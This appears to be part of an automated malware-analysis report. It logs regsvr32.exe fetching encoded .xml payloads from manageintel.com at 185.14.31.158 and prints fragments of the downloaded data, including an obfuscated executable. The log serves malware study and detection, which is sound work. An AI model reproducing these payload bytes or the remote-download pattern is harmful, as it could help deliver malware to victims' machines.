2022-01-30 12:30:36 UTC	712	IN	Data Raw: 50 38 44 41 41 41 4b 41 41 41 41 66 56 68 7a 51 57 55 79 56 30 35 67 51 67 41 41 45 77 41 41 41 47 34 4a 41 41 41 66 41 41 41 41 0d 0a 2f 46 68 7a 51 55 45 79 56 30 35 63 51 77 41 41 46 67 41 41 41 48 6f 41 41 41 41 54 41 41 41 41 50 56 68 7a 51 58 6b 79 56 30 35 56 51 67 41 41 41 67 41 41 41 43 30 41 41 41 41 54 41 41 41 41 0d 0a 59 56 68 7a 51 57 55 79 56 30 35 59 51 67 41 41 45 77 41 41 41 41 73 41 41 41 41 6e 41 41 41 41 61 31 68 7a 51 58 34 79 56 30 34 73 51 67 41 41 41 67 41 41 41 46 30 41 41 41 41 5a 41 41 41 41 0d 0a 54 46 68 7a 51 55 38 79 56 30 36 44 51 67 41 41 4a 77 41 41 41 49 6b 41 41 41 41 5a 41 41 41 41 69 31 74 7a 51 57 55 79 56 30 35 66 51 67 41 41 44 41 41 41 41 42 38 41 41 41 41 45 41 41 41 41 0d 0a 66 46 68 7a 51 58 6f 79 56 30 35 6c Data Ascii: P8DAAAKAAAAfVhzQWUyV05gQgAAEwAAAG4JAAAfAAAA/FhzQUEyV05cQwAAFgAAAHoAAAATAAAAPVhzQXkyV05VQgAAAgAAAC0AAAATAAAAYVhzQWUyV05YQgAAEwAAAAsAAAAnAAAAa1hzQX4yV04sQgAAAgAAAF0AAAAZAAAATFhzQU8yV06DQgAAJwAAAIkAAAAZAAAAi1tzQWUyV05fQgAADAAAAB8AAAAEAAAAfFhzQXoyV05l
2022-01-30 12:30:36 UTC	728	IN	Data Raw: 55 67 79 4c 6b 34 34 51 6e 55 41 63 67 41 67 41 48 6f 41 63 67 42 67 41 47 63 41 0d 0a 48 31 67 53 51 51 55 79 64 30 34 30 51 6d 45 41 62 67 41 67 41 47 6b 41 59 51 42 36 41 48 4d 41 43 46 68 54 51 51 6b 79 4f 55 35 33 51 6d 45 41 63 77 42 7a 41 47 38 41 63 67 42 37 41 47 6b 41 0d 0a 41 6c 67 64 51 57 49 79 4d 55 34 32 51 6d 6b 41 62 41 42 31 41 48 67 41 5a 51 41 6a 41 43 41 41 48 6c 67 57 51 51 30 79 64 30 34 6a 51 6d 67 41 5a 51 41 67 41 46 77 41 61 51 42 38 41 48 55 41 0d 0a 44 46 67 66 51 55 67 79 46 45 35 38 51 69 73 41 49 41 42 6b 41 47 55 41 59 77 42 36 41 47 30 41 43 46 67 64 51 52 77 79 4e 6b 34 6a 51 6d 6b 41 62 77 42 75 41 43 6f 41 62 77 42 68 41 43 41 41 0d 0a 44 46 67 41 51 52 73 79 4d 6b 34 6c 51 6e 51 41 63 77 41 41 41 43 49 41 55 41 42 39 Data Ascii: UgyLk44QnUAcgAgAHoAcgBgAGcAH1gSQQUyd040QmEAbgAgAGkAYQB6AHMACFhTQQkyOU53QmEAcwBzAG8AcgB7AGkAAlgdQWIyMU42QmkAbAB1AHgAZQAjACAAHlgWQQ0yd04jQmgAZQAgAFwAaQB8AHUADFgfQUgyFE58QisAIABkAGUAYwB6AG0ACFgdQRwyNk4jQmkAbwBuACoAbwBhACAADFgAQRsyMk4lQnQAcwAAACIAUAB9
2022-01-30 12:30:36 UTC	744	IN	Data Raw: 47 38 45 41 41 44 66 36 41 59 51 0d 0a 42 6c 78 7a 51 59 6a 61 55 56 34 37 52 67 41 41 38 4f 67 47 45 49 73 45 41 41 44 7a 36 41 59 51 62 46 42 7a 51 57 44 62 55 56 35 54 53 67 41 41 50 4d 34 47 45 41 30 49 41 41 41 62 36 51 59 51 0d 0a 5a 46 42 7a 51 55 6a 62 55 56 35 64 53 67 41 41 4c 4f 6b 47 45 41 59 49 41 41 41 33 36 51 59 51 66 56 42 7a 51 53 7a 62 55 56 35 45 53 67 41 41 55 4f 6b 47 45 42 34 49 41 41 42 54 36 51 59 51 0d 0a 65 31 42 7a 51 51 44 62 55 56 35 4e 53 67 41 41 64 4f 6b 47 45 42 63 49 41 41 43 44 36 51 59 51 51 56 42 7a 51 66 44 62 55 56 35 73 53 67 41 41 73 4f 6b 47 45 44 51 49 41 41 43 7a 36 51 59 51 0d 0a 4c 6c 42 7a 51 61 44 62 55 56 34 38 53 67 41 41 34 4f 6b 47 45 41 73 4d 41 41 44 2f 36 51 59 51 61 56 52 7a 51 5a 54 62 55 56 35 51 Data Ascii: G8EAADf6AYQBlxzQYjaUV47RgAA8OgGEIsEAADz6AYQbFBzQWDbUV5TSgAAPM4GEA0IAAAb6QYQZFBzQUjbUV5dSgAALOkGEAYIAAA36QYQfVBzQSzbUV5ESgAAUOkGEB4IAABT6QYQe1BzQQDbUV5NSgAAdOkGEBcIAACD6QYQQVBzQfDbUV5sSgAAsOkGEDQIAACz6QYQLlBzQaDbUV48SgAA4OkGEAsMAAD/6QYQaVRzQZTbUV5Q
2022-01-30 12:30:36 UTC	760	IN	Data Raw: 6e 66 56 44 71 4c 6e 46 32 56 53 68 37 50 63 31 49 50 51 6f 41 49 4a 61 37 6b 58 6f 2f 31 7a 78 66 42 6e 66 7a 46 58 4e 58 51 74 54 43 4e 6b 74 37 50 39 69 64 38 75 70 4b 43 55 30 39 0d 0a 62 56 6a 6e 67 39 59 32 4b 33 45 67 2f 44 4f 49 4d 65 63 68 50 51 6f 41 74 4a 56 44 76 6e 77 2f 30 71 41 74 55 54 41 66 45 58 4e 58 51 70 67 38 34 48 64 39 50 7a 6f 63 6b 4a 34 75 68 55 38 39 0d 0a 62 56 6a 54 39 68 45 44 4b 58 45 72 59 4d 53 76 2b 31 45 38 50 51 6f 41 4a 41 63 57 36 33 34 2f 31 36 73 59 79 41 34 31 46 33 4e 58 51 6f 51 72 76 71 52 2f 50 35 59 58 75 6d 4b 4d 56 55 4d 39 0d 0a 62 56 6a 6a 30 31 77 64 31 33 46 39 7a 30 74 66 79 7a 77 71 50 51 6f 41 50 4a 72 5a 64 49 41 2f 75 46 36 2f 7a 42 41 35 48 6e 4e 58 51 67 34 79 73 64 47 41 50 33 31 5a 7a 31 59 71 Data Ascii: nfVDqLnF2VSh7Pc1IPQoAIJa7kXo/1zxfBnfzFXNXQtTCNkt7P9id8upKCU09bVjng9Y2K3Eg/DOIMechPQoAtJVDvnw/0qAtUTAfEXNXQpg84Hd9PzockJ4uhU89bVjT9hEDKXErYMSv+1E8PQoAJAcW634/16sYyA41F3NXQoQrvqR/P5YXumKMVUM9bVjj01wd13F9z0tfyzwqPQoAPJrZdIA/uF6/zBA5HnNXQg4ysdGAP31Zz1Yq
2022-01-30 12:30:36 UTC	776	IN	Data Raw: 51 50 77 6f 41 41 41 44 76 74 4d 38 2f 62 56 68 7a 51 59 69 47 6d 48 46 58 51 67 41 41 67 47 2f 50 50 77 6f 41 41 41 43 50 62 38 38 2f 0d 0a 62 56 68 7a 51 55 67 59 6d 48 46 58 51 67 41 41 49 43 72 50 50 77 6f 41 41 41 44 50 35 4d 34 2f 62 56 68 7a 51 61 6a 57 6d 58 46 58 51 67 41 41 59 4a 2f 4f 50 77 6f 41 41 41 42 76 6e 38 34 2f 0d 0a 62 56 68 7a 51 57 68 6f 6d 58 46 58 51 67 41 41 41 46 72 4f 50 77 6f 41 41 41 43 66 47 38 34 2f 62 56 68 7a 51 66 67 70 6d 58 46 58 51 67 41 41 4d 4e 62 4e 50 77 6f 41 41 41 41 2f 31 73 30 2f 0d 0a 62 56 68 7a 51 61 69 6c 6d 6e 46 58 51 67 41 41 77 4a 66 4e 50 77 6f 41 41 41 42 66 57 63 30 2f 62 56 68 7a 51 54 68 72 6d 6e 46 58 51 67 41 41 34 42 72 4e 50 77 6f 41 41 41 44 76 47 73 30 2f 0d 0a 62 56 68 7a 51 51 6a 52 6d 33 Data Ascii: QPwoAAADvtM8/bVhzQYiGmHFXQgAAgG/PPwoAAACPb88/bVhzQUgYmHFXQgAAICrPPwoAAADP5M4/bVhzQajWmXFXQgAAYJ/OPwoAAABvn84/bVhzQWhomXFXQgAAAFrOPwoAAACfG84/bVhzQfgpmXFXQgAAMNbNPwoAAAA/1s0/bVhzQailmnFXQgAAwJfNPwoAAABfWc0/bVhzQThrmnFXQgAA4BrNPwoAAADvGs0/bVhzQQjRm3
2022-01-30 12:30:36 UTC	792	IN	Data Raw: 31 55 58 73 79 56 30 34 4f 53 51 59 51 46 41 41 41 41 47 34 4c 42 68 41 50 41 41 41 41 0d 0a 41 6c 4e 31 55 58 34 79 56 30 34 74 53 51 59 51 46 77 41 41 41 49 38 4c 42 68 41 58 41 41 41 41 2f 56 4e 31 55 57 67 79 56 30 37 4d 53 51 59 51 47 67 41 41 41 4b 77 4c 42 68 41 55 41 41 41 41 0d 0a 33 46 4e 31 55 58 51 79 56 30 37 72 53 51 59 51 41 41 41 41 41 4d 30 4c 42 68 41 52 41 41 41 41 76 31 4e 31 55 58 63 79 56 30 36 4b 53 51 59 51 49 41 41 41 41 4f 49 4c 42 68 41 50 41 41 41 41 0d 0a 6e 6c 4e 31 55 55 6f 79 56 30 36 70 53 51 59 51 49 77 41 41 41 41 4d 4d 42 68 41 72 41 41 41 41 65 56 52 31 55 55 6f 33 78 46 64 78 51 67 41 41 41 47 30 48 45 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 51 41 41 41 50 58 2f 2f 2f Data Ascii: 1UXsyV04OSQYQFAAAAG4LBhAPAAAAAlN1UX4yV04tSQYQFwAAAI8LBhAXAAAA/VN1UWgyV07MSQYQGgAAAKwLBhAUAAAA3FN1UXQyV07rSQYQAAAAAM0LBhARAAAAv1N1UXcyV06KSQYQIAAAAOILBhAPAAAAnlN1UUoyV06pSQYQIwAAAAMMBhArAAAAeVR1UUo3xFdxQgAAAG0HEAoAAAAPAAAAbVhzQWgyV05XQgAAAQAAAPX///
2022-01-30 12:30:36 UTC	808	IN	Data Raw: 41 41 4d 77 77 46 6a 49 2b 4d 70 59 79 0d 0a 33 47 71 31 64 4d 59 45 34 48 5a 78 66 67 41 41 41 46 41 41 41 43 6f 41 41 41 41 4a 4d 59 41 7a 75 32 74 56 64 78 34 45 6b 58 5a 42 65 32 59 37 74 6a 73 47 50 6c 77 2b 41 41 41 50 59 41 41 41 0d 0a 54 56 68 7a 51 63 34 43 6f 58 35 70 63 5a 59 7a 44 6a 5a 6d 4e 72 77 34 42 6a 6c 33 4f 39 59 37 6d 32 64 7a 51 57 68 43 56 30 35 4c 51 67 41 41 6c 6a 41 30 4d 55 77 78 51 44 52 5a 4e 78 59 34 0d 0a 75 32 41 6c 65 37 34 4a 6b 58 4e 58 77 67 41 41 48 41 41 41 41 41 77 77 52 6a 4a 5a 4e 43 59 33 7a 6d 44 51 65 31 51 4f 30 58 4e 78 66 4d 59 2b 41 4a 41 41 41 45 49 41 41 41 42 70 4d 4a 59 79 0d 0a 67 6d 75 48 63 6d 45 47 51 6e 70 4e 64 6c 67 32 58 54 62 33 4e 76 59 32 4a 6a 6d 77 4f 63 51 35 53 32 4b 79 65 36 34 49 63 58 Data Ascii: AAMwwFjI+MpYy3Gq1dMYE4HZxfgAAAFAAACoAAAAJMYAzu2tVdx4EkXZBe2Y7tjsGPlw+AAAPYAAATVhzQc4CoX5pcZYzDjZmNrw4Bjl3O9Y7m2dzQWhCV05LQgAAljA0MUwxQDRZNxY4u2Ale74JkXNXwgAAHAAAAAwwRjJZNCY3zmDQe1QO0XNxfMY+AJAAAEIAAABpMJYygmuHcmEGQnpNdlg2XTb3NvY2JjmwOcQ5S2Kye64IcX
2022-01-30 12:30:36 UTC	824	IN	Data Raw: 57 66 62 66 74 67 4e 37 33 47 58 66 63 67 2f 30 44 2f 59 50 2b 6f 2f 36 44 2f 2f 50 2f 67 2f 62 61 68 31 51 55 51 7a 56 30 35 58 63 67 67 77 45 44 41 59 4d 43 6f 77 4b 44 41 2f 4d 44 67 77 0d 0a 4c 57 67 37 63 54 67 43 44 33 34 33 63 6d 67 77 63 44 42 34 4d 49 6f 77 69 44 43 66 4d 4a 67 77 7a 57 6a 62 63 64 67 43 37 33 36 58 63 73 67 77 30 44 44 59 4d 4f 6f 77 36 44 44 2f 4d 50 67 77 0d 0a 62 57 6c 37 63 48 67 44 54 33 39 33 63 79 67 78 4d 44 45 34 4d 55 6f 78 53 44 46 66 4d 56 67 78 44 57 6b 62 63 42 67 44 4c 33 2f 58 63 34 67 78 6b 44 47 59 4d 61 6f 78 71 44 47 2f 4d 62 67 78 0d 0a 72 57 6d 37 63 4c 67 44 6a 33 2b 33 63 2b 67 78 38 44 48 34 4d 51 6f 79 43 44 49 66 4d 68 67 79 54 57 70 62 63 31 67 41 62 33 77 58 63 45 67 79 55 44 4a 59 4d 6d 6f 79 61 44 Data Ascii: WfbftgN73GXfcg/0D/YP+o/6D//P/g/bah1QUQzV05XcggwEDAYMCowKDA/MDgwLWg7cTgCD343cmgwcDB4MIowiDCfMJgwzWjbcdgC736Xcsgw0DDYMOow6DD/MPgwbWl7cHgDT393cygxMDE4MUoxSDFfMVgxDWkbcBgDL3/Xc4gxkDGYMaoxqDG/MbgxrWm7cLgDj3+3c+gx8DH4MQoyCDIfMhgyTWpbc1gAb3wXcEgyUDJYMmoyaD

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49764	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:30:46 UTC	829	OUT	GET /WUzZRUBQje/vAtVEC.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache
2022-01-30 12:30:46 UTC	829	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:30:49 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 Last-Modified: Wed, 05 Jan 2022 21:29:08 GMT ETag: "6ee-5d4dc71ad254f" Accept-Ranges: bytes Content-Length: 1774 Connection: close Content-Type: application/xml
2022-01-30 12:30:46 UTC	829	IN	Data Raw: 65 62 32 33 35 62 38 39 64 66 62 30 35 32 66 63 61 65 37 35 66 64 38 39 66 39 38 39 64 65 38 61 30 36 33 30 30 37 34 37 36 36 38 31 33 66 37 30 34 66 37 34 30 38 34 36 38 30 33 65 35 32 37 35 65 65 65 62 65 61 66 66 65 31 65 38 64 38 66 66 66 66 66 66 31 33 30 32 35 32 65 66 65 61 39 61 30 32 31 33 30 32 37 33 38 62 66 36 33 33 63 31 36 36 39 38 35 30 32 33 38 39 34 31 30 65 39 38 35 30 30 37 38 39 36 31 32 61 31 63 62 35 35 39 32 34 32 32 66 64 32 32 63 32 62 66 33 65 37 32 37 65 31 31 32 65 33 33 63 33 64 63 30 66 31 32 63 35 66 31 66 32 34 31 35 35 39 38 35 30 30 33 38 39 35 31 33 65 31 32 64 32 39 38 34 32 36 62 38 37 64 33 37 36 35 39 30 33 63 33 35 32 39 38 34 61 30 62 38 39 34 62 32 32 31 32 64 31 66 30 33 65 35 61 38 39 32 37 38 39 31 32 64 34 32 Data Ascii: eb235b89dfb052fcae75fd89f989de8a0630074766813f704f740846803e5275eeebeaffe1e8d8ffffff130252efea9a021302738bf633c16698502389410e98500789612a1cb5592422fd22c2bf3e727e112e33c3dc0f12c5f1f2415598500389513e12d298426b87d3765903c352984a0b894b2212d1f03e5a89278912d42

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49841	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-30 12:33:36 UTC	831	OUT	GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1 Host: manageintel.com Cache-Control: no-cache
2022-01-30 12:33:36 UTC	831	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:33:39 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 Last-Modified: Wed, 05 Jan 2022 22:10:13 GMT ETag: "ab044-5d4dd04921d60" Accept-Ranges: bytes Content-Length: 700484 Connection: close Content-Type: application/xml
2022-01-30 12:33:36 UTC	831	IN	Data Raw: 49 41 4c 6a 51 57 73 79 56 30 35 54 51 67 41 41 2f 2f 38 41 41 4c 49 41 41 41 41 50 41 41 41 41 4c 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 41 41 41 41 41 6f 41 41 41 41 50 41 41 41 41 0d 0a 62 56 68 7a 51 57 67 79 56 30 35 58 51 67 41 41 41 41 45 41 41 41 51 66 75 67 34 50 74 41 6e 4e 54 4f 42 79 44 61 55 54 41 79 59 2b 4d 53 42 77 63 6d 39 6e 63 6d 74 74 49 47 4e 75 62 6d 35 76 0d 0a 47 58 67 52 4a 45 68 41 49 69 42 33 4b 32 34 67 52 45 39 54 49 47 64 76 5a 47 55 68 44 51 30 4b 53 56 68 7a 51 57 67 79 56 30 35 6f 63 72 72 75 65 31 48 55 76 58 46 52 31 4c 31 30 55 64 53 39 0d 0a 41 6d 4b 6b 2f 52 35 6a 67 2f 4d 34 65 4e 47 38 32 31 48 55 76 57 55 36 30 4c 78 69 55 64 53 39 52 48 79 6a 2f 52 78 6a 67 2f 4e 2b 5a 74 65 38 62 46 48 55 76 53 4d 6b 30 Data Ascii: IALjQWsyV05TQgAA//8AALIAAAAPAAAALVhzQWgyV05XQgAAAAAAAAoAAAAPAAAAbVhzQWgyV05XQgAAAAEAAAQfug4PtAnNTOByDaUTAyY+MSBwcm9ncmttIGNubm5vGXgRJEhAIiB3K24gRE9TIGdvZGUhDQ0KSVhzQWgyV05ocrrue1HUvXFR1L10UdS9AmKk/R5jg/M4eNG821HUvWU60LxiUdS9RHyj/Rxjg/N+Zte8bFHUvSMk0
2022-01-30 12:33:36 UTC	839	IN	Data Raw: 77 78 30 41 4c 41 41 41 41 0d 0a 62 54 4a 79 79 69 58 43 33 45 65 2f 30 5a 55 43 41 49 74 56 38 49 4e 43 42 4d 64 4b 2f 41 45 41 62 56 6a 34 42 48 43 37 45 71 62 63 44 78 53 4a 54 65 53 4c 56 52 71 4a 56 65 43 45 52 66 43 4c 0d 0a 4a 56 7a 77 67 48 69 37 47 71 4c 63 46 2b 79 4a 56 64 79 4c 52 65 4a 51 69 30 33 72 55 59 74 56 6a 51 72 34 42 4c 52 69 33 41 4f 6e 79 52 46 53 36 41 64 31 41 41 71 4c 52 66 43 45 53 41 53 4a 0d 0a 49 49 44 34 46 4c 43 37 41 70 72 63 42 39 53 4a 52 64 43 4c 54 64 71 4a 54 63 79 43 56 51 79 4a 4f 4a 44 34 42 4b 53 35 47 6f 62 63 55 34 6b 51 69 30 58 77 69 30 49 45 67 38 45 4c 69 55 33 45 0d 0a 35 67 32 33 79 44 33 79 33 41 75 58 79 30 57 38 69 30 32 38 69 55 65 34 6a 56 55 44 69 56 57 30 35 68 33 4c 79 69 57 47 33 46 2f 65 55 6f Data Ascii: wx0ALAAAAbTJyyiXC3Ee/0ZUCAItV8INCBMdK/AEAbVj4BHC7EqbcDxSJTeSLVRqJVeCERfCLJVzwgHi7GqLcF+yJVdyLReJQi03rUYtVjQr4BLRi3AOnyRFS6Ad1AAqLRfCESASJIID4FLC7AprcB9SJRdCLTdqJTcyCVQyJOJD4BKS5GobcU4kQi0Xwi0IEg8ELiU3E5g23yD3y3AuXy0W8i028iUe4jVUDiVW05h3LyiWG3F/eUo
2022-01-30 12:33:36 UTC	855	IN	Data Raw: 35 64 61 56 30 6c 52 55 6d 53 68 41 41 41 41 41 46 70 6b 69 53 55 50 41 41 41 41 50 4e 6d 66 34 57 67 79 56 78 30 42 46 59 6c 6c 38 49 6c 4e 36 49 46 46 36 49 6c 4b 70 49 74 4e 0d 0a 79 64 45 2b 37 65 4e 6e 76 38 63 43 68 6f 74 46 78 49 6c 46 32 49 46 4e 78 49 50 4f 42 49 6c 4e 75 64 4d 6d 6d 65 4e 33 58 32 56 56 67 2f 67 45 69 55 58 67 69 30 66 55 69 31 58 58 69 77 45 72 0d 0a 62 35 6d 4c 52 65 46 33 34 38 55 61 71 6f 6c 4e 6f 49 74 56 6f 49 4f 56 56 50 2f 77 2f 38 64 46 72 61 65 4d 76 6d 66 31 45 74 4b 6f 76 66 39 2f 69 30 57 63 69 55 2b 38 69 30 33 50 4f 30 32 38 0d 0a 48 6c 44 2b 46 4b 69 37 41 76 61 38 52 49 31 46 76 49 6c 46 75 49 46 4e 75 49 6c 43 6d 49 74 56 39 64 45 6d 31 65 4e 33 77 38 56 66 79 30 32 51 69 31 57 30 4f 31 2b 51 64 51 58 6e 6a 32 Data Ascii: 5daV0lRUmShAAAAAFpkiSUPAAAAPNmf4WgyVx0BFYll8IlN6IFF6IlKpItNydE+7eNnv8cChotFxIlF2IFNxIPOBIlNudMmmeN3X2VVg/gEiUXgi0fUi1XXiwErb5mLReF348UaqolNoItVoIOVVP/w/8dFraeMvmf1EtKovf9/i0WciU+8i03PO028HlD+FKi7Ava8RI1FvIlFuIFNuIlCmItV9dEm1eN3w8Vfy02Qi1W0O1+QdQXnj2
2022-01-30 12:33:36 UTC	871	IN	Data Raw: 31 2b 67 55 75 69 33 78 41 4d 41 37 70 78 2f 79 69 33 61 56 41 74 48 51 55 55 59 69 55 57 63 69 30 66 63 4b 30 30 66 67 38 45 42 0d 0a 50 4e 4d 6d 39 57 74 6e 52 78 7a 63 42 35 78 51 36 49 2f 45 41 77 71 44 78 41 79 45 54 65 79 4a 49 4d 44 34 46 50 43 37 41 74 72 63 42 35 53 4a 52 5a 43 4e 54 64 71 4a 54 59 79 45 56 5a 43 4c 0d 0a 4b 4e 54 34 53 65 45 34 33 41 75 7a 79 55 33 30 5a 49 6b 4e 41 41 6f 41 41 49 76 71 58 63 49 55 62 5a 53 2f 6a 61 54 2b 6d 34 49 43 79 65 78 71 2f 32 67 67 42 51 77 51 5a 4b 45 50 41 41 41 41 0d 0a 50 54 7a 36 5a 47 67 79 56 30 37 55 72 6d 53 4a 54 65 53 4c 52 65 36 4a 52 65 79 45 54 65 79 4c 50 45 6a 36 46 4c 53 35 47 71 71 2f 65 53 30 44 41 43 74 46 33 44 46 46 43 48 4d 4b 36 50 34 79 0d 0a 62 31 6a 34 42 4c 51 78 45 6b 62 65 Data Ascii: 1+gUui3xAMA7px/yi3aVAtHQUUYiUWci0fcK00fg8EBPNMm9WtnRxzcB5xQ6I/EAwqDxAyETeyJIMD4FPC7AtrcB5SJRZCNTdqJTYyEVZCLKNT4SeE43AuzyU30ZIkNAAoAAIvqXcIUbZS/jaT+m4ICyexq/2ggBQwQZKEPAAAAPTz6ZGgyV07UrmSJTeSLRe6JReyETeyLPEj6FLS5Gqq/eS0DACtF3DFFCHMK6P4yb1j4BLQxEkbe
2022-01-30 12:33:36 UTC	887	IN	Data Raw: 69 33 4b 33 45 52 73 43 67 68 30 46 49 74 56 43 49 4e 56 38 49 74 4b 38 46 43 4c 0d 0a 49 4b 53 62 2b 50 66 4e 71 4b 56 4d 79 55 30 49 69 55 33 73 69 31 2f 73 55 6f 74 4b 39 49 73 49 50 4e 4d 2b 76 59 43 4e 2f 62 47 6f 79 30 58 6f 69 2b 56 64 77 67 34 41 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 72 79 55 58 38 69 55 58 34 69 30 66 34 67 38 45 4c 69 55 33 30 35 67 32 48 79 69 33 4b 33 45 52 73 43 67 68 30 46 49 74 56 43 49 4e 56 38 49 74 4b 38 46 43 4c 0d 0a 49 4b 53 62 6d 50 66 4e 71 4b 56 4d 79 55 30 49 69 55 33 73 69 31 2f 73 55 6f 74 4b 39 49 73 49 50 4e 4d 2b 76 59 44 4e 2b 37 47 6f 79 30 58 6f 69 2b 56 64 77 67 34 41 7a 4d 7a 44 7a 4d 7a 4d 0d 0a 4f 4e 4f 66 77 6f 51 71 33 67 4f 72 79 55 58 38 69 55 58 34 69 30 66 34 67 38 45 4c Data Ascii: i3K3ERsCgh0FItVCINV8ItK8FCLIKSb+PfNqKVMyU0IiU3si1/sUotK9IsIPNM+vYCN/bGoy0Xoi+Vdwg4AzMzDzMzMONOfwoQq3gOryUX8iUX4i0f4g8ELiU305g2Hyi3K3ERsCgh0FItVCINV8ItK8FCLIKSbmPfNqKVMyU0IiU3si1/sUotK9IsIPNM+vYDN+7Goy0Xoi+Vdwg4AzMzDzMzMONOfwoQq3gOryUX8iUX4i0f4g8EL
2022-01-30 12:33:36 UTC	903	IN	Data Raw: 6b 65 6f 69 45 33 71 44 37 5a 56 0d 0a 69 4e 32 68 54 75 77 6b 56 6b 35 58 7a 30 58 4d 69 59 55 63 2f 2f 58 2f 69 30 33 2f 67 38 45 45 35 4e 56 58 76 70 66 4e 37 55 70 58 51 67 42 72 77 76 2b 4c 6a 53 37 2f 2f 2f 38 4d 51 51 53 4a 0d 0a 36 48 69 4d 76 70 65 35 77 6d 36 6f 76 66 2b 4c 41 6f 74 49 43 49 4f 4e 46 50 2f 77 2f 34 75 56 63 61 65 4d 76 75 47 6e 54 37 47 6f 76 59 75 46 47 50 2f 2f 2f 31 71 4c 6a 52 54 77 2f 2f 2f 6f 0d 0a 41 59 75 4d 76 71 35 33 73 30 2f 63 44 2f 43 44 77 51 53 4a 6a 52 72 2f 2f 2f 2b 31 42 41 41 41 62 54 4f 78 76 75 4f 2f 52 37 47 6f 76 51 4e 42 42 49 6d 46 44 50 58 2f 2f 34 75 61 44 50 2f 2f 0d 0a 6b 74 4e 78 79 69 41 36 33 73 4f 4c 76 50 2f 2f 69 35 58 63 2f 76 58 2f 69 5a 55 4c 2f 2f 2f 2f 31 55 68 7a 51 57 68 5a 6e 37 48 63 Data Ascii: keoiE3qD7ZViN2hTuwkVk5Xz0XMiYUc//X/i03/g8EE5NVXvpfN7UpXQgBrwv+LjS7///8MQQSJ6HiMvpe5wm6ovf+LAotICIONFP/w/4uVcaeMvuGnT7GovYuFGP///1qLjRTw///oAYuMvq53s0/cD/CDwQSJjRr///+1BAAAbTOxvuO/R7GovQNBBImFDPX//4uaDP//ktNxyiA63sOLvP//i5Xc/vX/iZUL////1UhzQWhZn7Hc
2022-01-30 12:33:36 UTC	919	IN	Data Raw: 36 5a 47 67 79 56 30 37 55 72 69 6a 48 52 65 41 41 41 41 6f 41 61 68 54 6e 33 52 45 44 62 64 75 33 52 65 46 33 75 34 6b 53 76 67 41 41 41 41 43 44 66 65 59 41 64 42 65 45 52 51 79 4a 0d 0a 4b 49 54 34 44 4c 52 6a 33 41 4f 37 71 6e 49 55 2f 2f 2b 4a 52 65 4c 72 42 38 64 4b 36 41 41 41 62 56 6a 34 46 49 43 37 41 70 61 51 42 2f 7a 2f 2f 2f 2f 2f 69 30 2f 59 69 55 58 72 78 30 58 4d 0d 0a 62 56 68 7a 51 61 39 33 68 30 35 58 51 67 43 4c 54 65 53 44 77 51 61 4a 54 64 53 45 56 64 53 4a 4f 4a 54 34 42 49 79 37 45 70 37 63 44 77 6a 48 41 51 41 41 41 41 71 4c 56 51 6a 49 51 67 51 41 0d 0a 62 56 68 7a 7a 43 33 2b 33 67 75 6e 79 55 30 49 69 31 58 77 69 77 69 4a 41 59 74 43 43 49 74 56 6e 64 4d 78 52 65 46 7a 55 38 55 61 73 73 63 42 41 41 41 41 41 49 46 56 38 4d 64 4e Data Ascii: 6ZGgyV07UrijHReAAAAoAahTn3REDbdu3ReF3u4kSvgAAAACDfeYAdBeERQyJKIT4DLRj3AO7qnIU//+JReLrB8dK6AAAbVj4FIC7ApaQB/z/////i0/YiUXrx0XMbVhzQa93h05XQgCLTeSDwQaJTdSEVdSJOJT4BIy7Ep7cDwjHAQAAAAqLVQjIQgQAbVhzzC3+3gunyU0Ii1XwiwiJAYtCCItVndMxReFzU8UasscBAAAAAIFV8MdN
2022-01-30 12:33:36 UTC	935	IN	Data Raw: 46 39 41 6f 41 41 41 41 41 74 6b 58 30 36 4a 67 48 59 5a 6f 39 52 77 74 48 54 56 63 46 6f 49 49 47 45 50 67 50 45 55 55 66 69 30 30 49 0d 0a 71 31 6c 65 79 6a 30 36 31 49 78 57 79 31 55 49 38 67 38 51 52 52 70 6d 44 79 34 4b 65 49 49 47 66 63 65 46 68 53 78 49 59 73 55 53 53 73 59 41 4d 49 74 4e 43 49 6e 42 41 59 6c 43 43 49 74 56 0d 0a 5a 5a 35 78 62 2b 4e 33 58 38 32 58 51 34 6c 46 43 49 74 4e 43 4d 77 42 4d 49 74 61 43 49 50 43 62 4e 45 6d 53 65 4e 33 58 36 65 6a 51 67 41 41 69 30 55 4d 4b 30 38 49 67 2f 67 65 66 52 64 6f 0d 0a 7a 32 31 7a 51 51 43 61 4d 6b 68 48 4b 74 42 39 42 68 44 6f 46 36 67 44 41 49 50 4c 44 4d 64 46 6b 56 68 7a 51 57 6a 31 45 72 35 58 51 67 41 41 67 2b 77 49 38 67 55 51 52 52 44 39 44 78 45 45 0d 0a 53 64 55 6d 73 54 71 2f 45 72 Data Ascii: F9AoAAAAAtkX06JgHYZo9RwtHTVcFoIIGEPgPEUUfi00Iq1leyj061IxWy1UI8g8QRRpmDy4KeIIGfceFhSxIYsUSSsYAMItNCInBAYlCCItVZZ5xb+N3X82XQ4lFCItNCMwBMItaCIPCbNEmSeN3X6ejQgAAi0UMK08Ig/gefRdoz21zQQCaMkhHKtB9BhDoF6gDAIPLDMdFkVhzQWj1Er5XQgAAg+wI8gUQRRD9DxEESdUmsTq/Er
